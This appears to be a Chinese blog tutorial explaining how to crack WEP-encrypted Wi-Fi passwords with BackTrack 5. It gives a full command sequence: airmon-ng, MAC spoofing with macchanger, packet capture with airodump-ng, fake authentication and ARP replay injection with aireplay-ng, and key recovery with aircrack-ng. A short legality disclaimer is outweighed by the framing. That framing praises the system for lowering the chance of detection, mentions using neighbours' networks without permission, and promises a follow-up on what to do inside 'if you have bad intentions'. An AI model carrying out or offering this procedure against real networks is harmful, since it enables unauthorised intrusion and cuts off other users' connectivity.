阅读 77

Backtrack破解wifi热点密码

也许您已经知道了在设置无线密码的时候一定要使用WPA加密的方式,因为WEP加密会非常容易被破解,那到底有多容易呢?本文将会告诉你如何用Backtrack轻松破解无线密码。

 

Backtrack是什么呢?如果你心中有这个疑问,那么你最好去Google一下,因为这里我不打算讲的。但我会提供一个下载地址。

 

今天这个教程将一步步教您如何通过使用Backtrak系统破解wep加密的 ,但首先,你必须明白知识虽然是一种力量,但拥有知识并不意味着你可以去做非法的事情,一定要切记。知道怎样开锁并不意味着你一定会成为一个小偷,只把这 篇教程当做一种智力练习吧,如果你不能做到这一点,还是请你不要向下看比较好。

 

其实在互联网上如何破解无线密码的教程非常之多,总结起来,无非是 aircrack-ng、beini(奶瓶)之流,采用的原理就是伪装成无线网内的合法用户,拦截密码。也许你会问,有很多教程比你的容易多了,为什么要用backtrack呢?有几个原因:

 

Backtrack更专业:它是专门为无线网络安全开发的系统,内部集成了Linux下可用所有黑客工具,不仅破解WEP密码,用它可以完成一整个入侵流程

Backtrack更安全:BT的另一个好处是你被发现的可能性会降低,最起码你可以伪装mac地址

用windows久了,你不烦吗???

你会需要些什么?

除非你是个无线黑客老手,否则这些设备中总会有一个你是要去准备的,下面是你获得这些东西的方法:

 

无线网卡—这是最重要的设备,一般来说笔记本会内置一个,不过有很多内置的无线网卡性能极差,有时候不能支持air-dump的功能,推荐买一个外接的USB无线网卡。

Backtrack 5 CD 如果你没有这项装备,你有两个选择,一个是刻录一张backtrack cd,另一个使用虚拟机运行Backtrack系统,本站都提供了教程。

一个采用WEP加密的无线网络 信号要达到可以入侵的强度的话,至少在无线AP的60米之内,建议自己搭建,不要去测试别人的,万一你的邻居是个大汉,你岂不是要····

得记几条命令行 这种破解过程需要打入大量的命令行,你可以把他们都发送到你的手机上,随时查看,也可以开着这个页面,无所谓

破解WEP

首先要运行 Konsole,即Backtrack下的命令行,很容易找的,就在面板上

 

输入这个命令,取得网络接口的列表

 

airmon-ng这是我得到的结果 ra0,你得到的结果很有可能是不同的,记下这个代号,在后面的命令中代替我使用的 ra0

 

现在,执行以下命令

 

airmon-ng stop (interface)

ifconfig (interface) down

macchanger --mac 00:11:22:33:44:55 (interface)

airmon-ng start (interface)

 

对比我得到的结果,如果相同,那么恭喜你,你已经成功的伪造了你的mac地址为:00:11:22:33:44:55,如果不一样,那么很遗憾,你的网卡不支持。

 

现在来看看这个无线网,执行

 

airodump-ng (interface)这个命令会返回周围可用的无线信号,当你找到你要的地址时,按下Ctrl+C 停止侦测,找到你的目标,一定是一个wep加密方式的,记下他的BSSID。

 

 

下面我们来看看目标网络中有些什么,抓一些包来看看,执行

 

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)channel那里就是填你的网络频道,bssid填写你刚才得到的dssid地址,filename随便填一个。顺便提一句,你可以用 Shift+Insert 组合键在Koncole里黏贴东西的。

 

 

让他在这里抓包吧,咱们干点别的,打开另一个Konsole,输入

 

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)这里的ESSID 就是AP(无线接入点 Access Point)的 SSID,这里是 yoyo 执行这条命令之后,你应该会得到”Association successful”的返回。

 

 

好了,快成功了,现在执行

 

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)这样我们就在制造了一些路由流量, 以便加速我们的破解,几分钟之后,这个命令栏就会疯狂的读写packet, (同时,此无线网内的其他终端应该无法访问互联网) 这时候你可以去干点别的,注意一下 “#Data” 这个栏,当它达到一万左右的时候就差不多了。

 

接收数据的速度是由你的网卡和网速决定的,不过半个小时一般就足够了。

 

当你收集到足够多的数据时,就是揭示密码MM真面目的时候了,启动第三个命令行,执行

 

aircrack-ng -b (bssid) (file name-01.cap)记得你的filename吗?给他加个.cap

 

如果数据不够,就会返回失败,你就得收集更多的数据重试,如果成功了,就会像下图一样:

 

 

无线密码就是 “KEY FOUND.” 旁边的那些字,被我盖住了····

 

破解了这个密码之后,脆弱的无线内网就暴露在你面前了,接下来(如果你不怀好意的话)该干什么呢?下次再讲。

 

要是你只想蹭网,那你还不如用beini呢。

你给了我眼睛,却不给我光明。


文章分类
代码人生
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐